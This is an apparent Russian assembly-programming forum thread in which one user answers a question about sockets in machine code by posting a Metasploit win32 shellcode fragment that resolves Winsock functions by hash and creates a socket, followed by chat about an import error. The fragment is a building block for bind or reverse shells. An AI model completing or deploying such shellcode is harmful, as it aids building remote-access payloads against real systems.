Работа с сокетами в манинном коде

asmlamo · 19 дек 2010

Смотри Metasploit

Там есть shell коды под win32 в том числе и для работы с сокетами.

asmlamo · 19 дек 2010

Код (Text):

; Title: Win32 Socket Initialization

; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003

; Author: hdm[at]metasploit.com

[BITS 32]

%include "win32_stage_api.asm"

sub esp, 0x100

push edi ; [ebp + 8] = LoadLibraryA

push esi ; [ebp + 4] = LGetProcAddress

push ebx ; [ebp + 0] = kernel32.dll base

mov ebp, esp

call LLoadWinsock

%define FN_RECV [ebp + 24]

%define FN_SEND [ebp + 28]

%define FN_ACCEPT [ebp + 32]

%define FN_BIND [ebp + 36]

%define FN_LISTEN [ebp + 40]

%define FN_WSASOCK [ebp + 44]

%define FN_WSASTART [ebp + 48]

LWSDataSegment:

;========================

dd 0x190 ; used by wsastartup

dd 0xe71819b6 ; recv [ebp + 24]

dd 0xe97019a4 ; send [ebp + 28]

dd 0x498649e5 ; accept [ebp + 32]

dd 0xc7701aa4 ; bind [ebp + 36]

dd 0xe92eada4 ; listen [ebp + 40]

dd 0xadf509d9 ; WSASocketA [ebp + 44]

dd 0x3bfcedcb ; WSAStartup [ebp + 48]

db "WS2_32", 0x00

;========================

LLoadWinsock:

pop ebx ; save address to data in ebx

lea ecx, [ebx + 32] ; find address of "WS2_32.DLL"

push ecx ; push address of "WS2_32.DLL"

call edi ; call LoadLibraryA("WS2_32.DLL")

mov edi, ebx ; store base of data section in edi

mov ebx, eax ; store base of winsock in ebx

lea esi, [ebp + 20] ; store base of function table

push byte 0x07 ; load five functions by hash

pop ecx ; configure the counter

Looper:

push ecx ; save the counter

push ebx ; dll handle

push dword [edi + ecx * 4] ; function hash value

call [ebp + 4] ; find the address

pop ecx ; restore the counter

mov [esi + ecx * 4], eax ; stack segment to store addresses

loop Looper

LWSAStartup: ; WSAStartup (0x101, DATA)

sub esp, [edi]

push esp

push dword [edi]

call FN_WSASTART

xor eax, eax

LWSASocketA: ; WSASocketA (2,1,0,0,0,0)

push eax

push eax

push eax

push eax

inc eax

push eax

inc eax

push eax

call FN_WSASOCK

mov edi, eax

skomarov · 22 дек 2010

777user777
Молодец! Успехов, от всего сердца!

777user777 · 24 дек 2010

я написал небольшую программу,она создаёт окно (для обработки сообщений) и сокет.
поддерживает подключение
но у неё небольшая проблема:после запуска (когда создаётся окно,вызывается функция RegisterClassA) она выкидывает сообщение:
"Точка входа в процедуру isterClassA не найдена в библиотеке user32.dll".
изза чего может такое получаться?

n0name · 24 дек 2010

из-за корявого импорта

r90 · 25 дек 2010

newbie

Работа с сокетами в малинном коде :P
Нажмите, чтобы раскрыть...

Там написано "в манином". Просто 'н' сдвоилась.

newbie · 26 дек 2010

я знаю. просто шутка была

Войти или зарегистрироваться

Работа с сокетами в манинном коде

asmlamo Well-Known Member

asmlamo Well-Known Member

skomarov New Member

777user777 New Member

n0name New Member

r90 New Member

newbie New Member

Войти или зарегистрироваться

Работа с сокетами в манинном коде

asmlamo Well-Known Member

asmlamo Well-Known Member

skomarov New Member

777user777 New Member

n0name New Member

r90 New Member

newbie New Member

Быстрый поиск